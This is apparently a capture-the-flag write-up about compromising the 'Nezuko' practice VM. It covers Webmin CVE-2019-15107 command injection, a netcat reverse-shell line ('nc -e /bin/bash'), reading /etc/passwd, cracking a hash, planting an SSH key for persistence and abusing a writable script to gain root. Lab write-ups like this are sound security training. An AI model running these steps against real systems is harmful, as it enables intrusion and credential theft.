Nezuko
Easy to Hard
Last updated
Easy to Hard
Last updated
My friend ask me to do some checking on their vulnerable machine, unfortunately got some problem with the machine and it cannot be discover by the network. After several try and error, I still canβt fix the problem. So, I do check with other vulnerable machine to figure out either my machine got problem or the vulnerable machine got problem. XD
I came out to try Nezuko box. Before this, I do watch this anime and know it have it own vulnerable machine. Let move to nezuko-chan machine.
PS: in this testing, I assume that nezuko-chan and my machine are in same subnet. Using host-only adapter for both machine.
As usual, I will start with scanning the port of nezuko machine. Using simple command
nmap -p- --open -A nezuko -O nezukoport -vv
-p- = scan all port
--open = filter open port only
-O = output into nezukoport
--vv =verbose
The result show some interesting port. Port 22 and 80 seem nothing interesting. But look at port 13337, it appear to have miniserver 1.920. Which this is webmin.
After doing some research, this port it vulnerable with CVE-2019-15107. The parameter old in password_change.cgi contains a command injection vulnerability. Interesting right. We can inject our malicious payload inside password_change.cgi.
Next, let look with searchsploit to find ready to use payload. For this case, im not using Metasploit.
After download the payload. Let try this payload to see either nezuko machine vulnerable or not to this.
HMMMβ¦. Nezuko chan, you machine are VULNERABLEβ¦Haiyaaβ¦.
After we confirm this machine vulnerable, let modify little bit payload to make it listening to our netcat.
Our final code will look like this.
nc -e /bin/bash Machine_IP port
Before we start running this payload again, make sure our listener are up.
Everything ready, let push ENTER button.
We are in as nezuko. HmHm. Let do some recon in here to find any interesting part.
Nezuko machine appear to have two user : zenitsu and nezuko
HM HM,
We got directory and text file.
Looking into nezuko.txt. We got the first flag.
Next, I try to move into zenitsu. And I got it. No permission denied.
And I can read the file which contain second flag. How amazing this machine is.
Before that, moving to directory to_nezuko. It have something fishy .
This script allow us to escalate as root user by exploit the script.
Since we know only zenitsu is allow to modify this script, we need to be zenitsu. In order to be zenitsu, we have to know their password. How can we find the password???
HERE
cat /etc/passwd
We got hash for zenitsu. Let crack this hash using johntheripper.
Crack it.
I got the credential. Let change to zenitsu.
Unfortunately the user cant be change. I notice that, this not stable shell. So I need a stable shell to execute this command. Remember early in nezuko dir, we got .ssh. Let put our ssh into authorized key.
Creating RSA key
ssh-keygen -t rsa
Now it will create rsa key. Let name it as abg.
We got this 2 file. Let put abg.pub into authorized_key in nezuko machine.
Now we can close our listener, and connect to nezuko machine using ssh.
Now we get interactive shell. Let continue our last part.
Since we can change into zenitsu, let modify the script.
Put our listener and wait for several minute.
Waiting the job being done. Waintingβ¦ waitingβ¦. Waitingβ¦.. ANDD!!
Yes we in. We got the last flag.
I would like to said thank you for preparing this challenge. I will rate this box as easy challenge. Thank you for reading and have time for it.
Nezuko and Zenitsu. I pawn you. Donβt give up in chasing your dream zenitsu. I feel u. HEHE
